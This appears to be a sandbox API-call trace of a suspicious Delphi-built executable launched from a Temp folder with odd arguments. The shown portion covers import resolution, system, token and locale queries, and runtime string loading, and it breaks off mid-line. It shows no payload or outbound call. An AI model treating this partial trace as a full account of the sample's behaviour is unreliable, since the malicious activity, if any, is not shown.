GetProcAddress (hModule=0x76910000, lpProcName="LeaveCriticalSection") returned 0x77277760 [0115.489] GetProcAddress (hModule=0x76910000, lpProcName="EnterCriticalSection") returned 0x772777a0 [0115.489] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSection") returned 0x7728a149 [0115.490] GetProcAddress (hModule=0x76910000, lpProcName="FindFirstFileW") returned 0x769653b2 [0115.490] GetProcAddress (hModule=0x76910000, lpProcName="FindClose") returned 0x76960e62 [0115.490] GetProcAddress (hModule=0x76910000, 
lpProcName="WriteFile") returned 0x76961400 [0115.490] GetProcAddress (hModule=0x76910000, lpProcName="GetStdHandle") returned 0x76961e46 [0115.490] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0115.490] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0115.490] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0115.490] GetProcAddress (hModule=0x76910000, lpProcName="RaiseException") returned 0x7694eb60 [0115.490] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryA") returned 0x7696395c [0115.490] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0115.490] GetProcAddress (hModule=0x76910000, lpProcName="TlsSetValue") returned 0x7695da88 [0115.490] GetProcAddress (hModule=0x76910000, lpProcName="TlsGetValue") returned 0x7695da70 [0115.490] GetProcAddress (hModule=0x76910000, lpProcName="LocalFree") returned 0x7695ca64 [0115.490] GetProcAddress (hModule=0x76910000, lpProcName="LocalAlloc") returned 0x76963363 [0115.490] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0115.490] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0115.490] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0115.490] GetProcAddress (hModule=0x769f0000, lpProcName="OpenThreadToken") returned 0x76a0432c [0115.490] GetProcAddress (hModule=0x769f0000, lpProcName="OpenProcessToken") returned 0x76a04304 [0115.491] GetProcAddress (hModule=0x769f0000, lpProcName="GetUserNameA") returned 0x76a1a4b4 [0115.491] GetProcAddress (hModule=0x769f0000, lpProcName="GetTokenInformation") returned 0x76a0431c [0115.491] GetProcAddress (hModule=0x769f0000, lpProcName="GetSidSubAuthorityCount") returned 0x76a00e0c [0115.491] GetProcAddress (hModule=0x769f0000, lpProcName="GetSidSubAuthority") returned 0x76a00e24 [0115.491] GetProcAddress (hModule=0x769f0000, lpProcName="FreeSid") returned 
0x76a0412e [0115.491] GetProcAddress (hModule=0x769f0000, lpProcName="EqualSid") returned 0x76a0410b [0115.491] GetProcAddress (hModule=0x769f0000, lpProcName="AllocateAndInitializeSid") returned 0x76a040e6 [0115.491] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0115.491] GetProcAddress (hModule=0x769f0000, lpProcName="RegQueryValueExW") returned 0x76a046ad [0115.491] GetProcAddress (hModule=0x769f0000, lpProcName="RegOpenKeyExW") returned 0x76a0468d [0115.491] GetProcAddress (hModule=0x769f0000, lpProcName="RegCloseKey") returned 0x76a0469d [0115.491] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0115.491] GetProcAddress (hModule=0x769f0000, lpProcName="CryptGenRandom") returned 0x769fdfc8 [0115.491] GetProcAddress (hModule=0x769f0000, lpProcName="CryptReleaseContext") returned 0x769fe124 [0115.491] GetProcAddress (hModule=0x769f0000, lpProcName="CryptAcquireContextW") returned 0x769fdf14 [0115.492] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76750000 [0115.492] GetProcAddress (hModule=0x76750000, lpProcName="CoTaskMemFree") returned 0x767a6f41 [0115.492] GetProcAddress (hModule=0x76750000, lpProcName="StringFromCLSID") returned 0x7676eb17 [0115.492] GetProcAddress (hModule=0x76750000, lpProcName="CoCreateInstance") returned 0x76799d0b [0115.492] GetProcAddress (hModule=0x76750000, lpProcName="CoUninitialize") returned 0x767986d3 [0115.492] GetProcAddress (hModule=0x76750000, lpProcName="CoInitialize") returned 0x7676b636 [0115.492] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0115.492] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayPtrOfIndex") returned 0x76c2e1ce [0115.492] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayGetUBound") returned 0x76c2e127 [0115.492] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayGetLBound") returned 0x76c2e173 [0115.492] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayCreate") returned 0x76c2e263 [0115.492] GetProcAddress 
(hModule=0x76c10000, lpProcName="VariantChangeType") returned 0x76c15dee [0115.492] GetProcAddress (hModule=0x76c10000, lpProcName="VariantCopy") returned 0x76c148f1 [0115.492] GetProcAddress (hModule=0x76c10000, lpProcName="VariantClear") returned 0x76c13eae [0115.492] GetProcAddress (hModule=0x76c10000, lpProcName="VariantInit") returned 0x76c13ed5 [0115.493] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0115.493] GetProcAddress (hModule=0x76c10000, lpProcName="GetErrorInfo") returned 0x76c13f21 [0115.493] GetProcAddress (hModule=0x76c10000, lpProcName="SysFreeString") returned 0x76c13e59 [0115.493] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0115.493] GetProcAddress (hModule=0x76c10000, lpProcName="SysFreeString") returned 0x76c13e59 [0115.493] GetProcAddress (hModule=0x76c10000, lpProcName="SysReAllocStringLen") returned 0x76c17810 [0115.493] GetProcAddress (hModule=0x76c10000, lpProcName="SysAllocStringLen") returned 0x76c145d2 [0115.493] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75830000 [0115.493] GetProcAddress (hModule=0x75830000, lpProcName="SHGetSpecialFolderPathW") returned 0x75850468 [0115.493] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76b40000 [0115.493] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxA") returned 0x76b9ea11 [0115.493] GetProcAddress (hModule=0x76b40000, lpProcName="CharNextW") returned 0x76b50be6 [0115.493] GetProcAddress (hModule=0x76b40000, lpProcName="LoadStringW") returned 0x76b4dfba [0115.493] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76b40000 [0115.493] GetProcAddress (hModule=0x76b40000, lpProcName="PeekMessageW") returned 0x76b5634a [0115.494] GetProcAddress (hModule=0x76b40000, lpProcName="MsgWaitForMultipleObjects") returned 0x76b537d8 [0115.494] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxW") returned 0x76b9ea5f [0115.494] GetProcAddress (hModule=0x76b40000, lpProcName="LoadStringW") returned 0x76b4dfba [0115.494] 
GetProcAddress (hModule=0x76b40000, lpProcName="GetSystemMetrics") returned 0x76b567cf [0115.494] GetProcAddress (hModule=0x76b40000, lpProcName="CharUpperBuffW") returned 0x76b5ebd5 [0115.494] GetProcAddress (hModule=0x76b40000, lpProcName="CharUpperW") returned 0x76b5e981 [0115.494] GetProcAddress (hModule=0x76b40000, lpProcName="CharLowerBuffW") returned 0x76b53afe [0115.494] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x12ff68 | out: lpflOldProtect=0x12ff68*=0x40) returned 1 [0115.494] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x12ff68 | out: lpflOldProtect=0x12ff68*=0x4) returned 1 [0115.494] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0115.494] SetThreadLocale (Locale=0x400) returned 1 [0115.495] GetVersion () returned 0x1db10106 [0115.495] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0115.495] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadPreferredUILanguages") returned 0x769522d7 [0115.495] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0115.495] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadPreferredUILanguages") returned 0x7694e627 [0115.495] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0115.495] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadUILanguage") returned 0x7694ae42 [0115.495] GetSystemInfo (in: lpSystemInfo=0x12fc34 | out: lpSystemInfo=0x12fc34*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0115.496] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FIXLNKVIEW\" \"60000\"" 
[0115.496] GetStartupInfoW (in: lpStartupInfo=0x12fc10 | out: lpStartupInfo=0x12fc10*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4, hStdOutput=0x200202, hStdError=0x1f80)) [0115.496] GetACP () returned 0x4e4 [0115.496] GetCurrentThreadId () returned 0xdec [0115.496] GetVersion () returned 0x1db10106 [0115.496] GetVersionExW (in: lpVersionInformation=0x12fb44*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x7728f879, dwMinorVersion=0x7728f99a, dwBuildNumber=0x6f1cb0, dwPlatformId=0x12fbaa, szCSDVersion="") | out: lpVersionInformation=0x12fb44*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0115.496] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x12da00, nSize=0x20a | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\hvgo9ckx.exe")) returned 0x30 [0115.496] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12d7ea, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\hvgo9ckx.exe")) returned 0x30 [0115.496] VirtualAlloc (lpAddress=0x0, dwSize=0x13fff0, flAllocationType=0x1000, flProtect=0x4) returned 0x13f0000 [0115.497] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0115.497] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0115.497] RegOpenKeyExW (in: hKey=0x80000001, 
lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0115.497] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0115.497] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0115.497] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0115.497] GetUserDefaultUILanguage () returned 0x409 [0115.498] IsValidLocale (Locale=0x409, dwFlags=0x2) returned 1 [0115.498] GetThreadUILanguage () returned 0x120409 [0115.498] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12d768 | out: pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12d768) returned 1 [0115.498] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x151a680, pcchLanguagesBuffer=0x12d768 | out: pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x151a680, pcchLanguagesBuffer=0x12d768) returned 1 [0115.498] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.en-US", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0115.499] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.en", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0115.499] GetUserDefaultUILanguage () returned 0x409 [0115.499] GetLocaleInfoW (in: Locale=0x409, LCType=0x3, lpLCData=0x12d784, cchData=4 | out: lpLCData="ENU") returned 4 [0115.499] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.ENU", 
lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0115.499] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.EN", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0115.499] LoadStringW (in: hInstance=0x400000, uID=0xffc7, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Method called on disposed object") returned 0x20 [0115.500] LoadStringW (in: hInstance=0x400000, uID=0xffc6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Feature not implemented") returned 0x17 [0115.500] LoadStringW (in: hInstance=0x400000, uID=0xffc5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Monitor support function not initialized") returned 0x28 [0115.500] LoadStringW (in: hInstance=0x400000, uID=0xffc4, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Object lock not owned") returned 0x15 [0115.500] LoadStringW (in: hInstance=0x400000, uID=0xffc3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Exception in safecall method") returned 0x1c [0115.500] LoadStringW (in: hInstance=0x400000, uID=0xffc2, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Interface not supported") returned 0x17 [0115.500] LoadStringW (in: hInstance=0x400000, uID=0xffc0, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="External exception %x") returned 0x15 [0115.500] LoadStringW (in: hInstance=0x400000, uID=0xffc1, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Assertion failed") returned 0x10 [0115.500] LoadStringW (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0115.500] LoadStringW (in: hInstance=0x400000, uID=0xffdc, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid argument") returned 0x10 [0115.500] LoadStringW (in: hInstance=0x400000, uID=0xffd2, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0115.500] 
LoadStringW (in: hInstance=0x400000, uID=0xffed, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0115.500] LoadStringW (in: hInstance=0x400000, uID=0xffd6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid variant operation") returned 0x19 [0115.500] LoadStringW (in: hInstance=0x400000, uID=0xffd5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0115.500] LoadStringW (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Stack overflow") returned 0xe [0115.500] LoadStringW (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Control-C hit") returned 0xd [0115.500] LoadStringW (in: hInstance=0x400000, uID=0xffe8, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Privileged instruction") returned 0x16 [0115.500] LoadStringW (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Access violation") returned 0x10 [0115.500] LoadStringW (in: hInstance=0x400000, uID=0xffe3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid class typecast") returned 0x16 [0115.500] LoadStringW (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point underflow") returned 0x18 [0115.500] LoadStringW (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point overflow") returned 0x17 [0115.500] LoadStringW (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point division by zero") returned 0x1f [0115.500] LoadStringW (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0115.500] LoadStringW (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Integer overflow") returned 0x10 
[0115.500] LoadStringW (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Range check error") returned 0x11 [0115.500] LoadStringW (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Division by zero") returned 0x10 [0115.500] LoadStringW (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x12dc2c, cchBufferMax=4096 | out: lpBuffer="Out of memory") returned 0xd [0115.500] LoadStringW (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x12dc2c, cchBufferMax=4096 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0115.501] GetVersionExW (in: lpVersionInformation=0x12fb40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12fb40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0115.501] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76910000 [0115.501] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x704438 [0115.501] GetProcAddress (hModule=0x76910000, lpProcName="GetNativeSystemInfo") returned 0x7694be77 [0115.501] GetNativeSystemInfo (in: lpSystemInfo=0x12fb1c | out: lpSystemInfo=0x12fb1c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0115.501] LoadStringW (in: hInstance=0x400000, uID=0xff68, lpBuffer=0x12db00, cchBufferMax=4096 | out: lpBuffer="Windows") returned 0x7 [0115.501] LoadStringW (in: hInstance=0x400000, uID=0xff6b, lpBuffer=0x12db00, cchBufferMax=4096 | out: lpBuffer="Windows 7") returned 0x9 [0115.501] LoadStringW (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x12dc24, cchBufferMax=4096 | out: 
lpBuffer="Invalid numeric input") returned 0x15 [0115.501] LoadStringW (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Disk full") returned 0x9 [0115.501] LoadStringW (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Read beyond end of file") returned 0x17 [0115.501] LoadStringW (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="File access denied") returned 0x12 [0115.501] LoadStringW (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Too many open files") returned 0x13 [0115.501] LoadStringW (in: hInstance=0x400000, uID=0xff85, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Invalid file name - %s") returned 0x16 [0115.501] LoadStringW (in: hInstance=0x400000, uID=0xff7d, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="The specified file was not found") returned 0x20 [0115.501] GetVersionExW (in: lpVersionInformation=0x12fb34*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x10000, dwMinorVersion=0x5e030006, dwBuildNumber=0x11c, dwPlatformId=0x6, szCSDVersion="\x01") | out: lpVersionInformation=0x12fb34*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0115.501] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0115.501] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0115.501] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x14e80dc, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetDiskFreeSpaceExW", lpUsedDefaultChar=0x0) returned 19 [0115.501] GetProcAddress 
(hModule=0x76910000, lpProcName="GetDiskFreeSpaceExW") returned 0x7694de40 [0115.501] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa0a, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\hvgo9ckx.exe")) returned 0x30 [0115.501] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0115.502] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0115.502] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0115.502] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0115.502] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0115.502] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0115.502] GetThreadLocale () returned 0x409 [0115.502] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x12fb50 | out: lpCPInfo=0x12fb50) returned 1 [0115.502] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0115.502] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0115.502] GetProcAddress (hModule=0x76910000, lpProcName="GetLogicalProcessorInformation") returned 0x76942004 [0115.502] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76910000 [0115.502] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x704448 [0115.502] 
GetProcAddress (hModule=0x76910000, lpProcName="GetLogicalProcessorInformation") returned 0x76942004 [0115.502] GetLogicalProcessorInformation (in: Buffer=0x0, ReturnedLength=0x12fab0 | out: Buffer=0x0, ReturnedLength=0x12fab0) returned 0 [0115.502] GetLastError () returned 0x7a [0115.502] GetLogicalProcessorInformation (in: Buffer=0x14d99d0, ReturnedLength=0x12fab0 | out: Buffer=0x14d99d0, ReturnedLength=0x12fab0) returned 1 [0115.503] GetCurrentThreadId () returned 0xdec [0115.503] GetCurrentThreadId () returned 0xdec [0115.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="2") returned 2 [0115.503] GetThreadLocale () returned 0x409 [0115.503] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f0d0, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1 [0115.503] GetThreadLocale () returned 0x409 [0115.503] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f174, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1 [0115.503] GetCurrentThreadId () returned 0xdec [0115.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sun") returned 4 [0115.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sunday") returned 7 [0115.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Mon") returned 4 [0115.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Monday") returned 7 [0115.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Tue") returned 4 [0115.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Tuesday") returned 8 [0115.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Wed") returned 4 [0115.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Wednesday") 
returned 10 [0115.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Thu") returned 4 [0115.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Thursday") returned 9 [0115.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Fri") returned 4 [0115.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Friday") returned 7 [0115.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sat") returned 4 [0115.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Saturday") returned 9 [0115.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jan") returned 4 [0115.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="January") returned 8 [0115.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Feb") returned 4 [0115.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="February") returned 9 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Mar") returned 4 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="March") returned 6 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Apr") returned 4 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="April") returned 6 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="May") returned 4 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="May") 
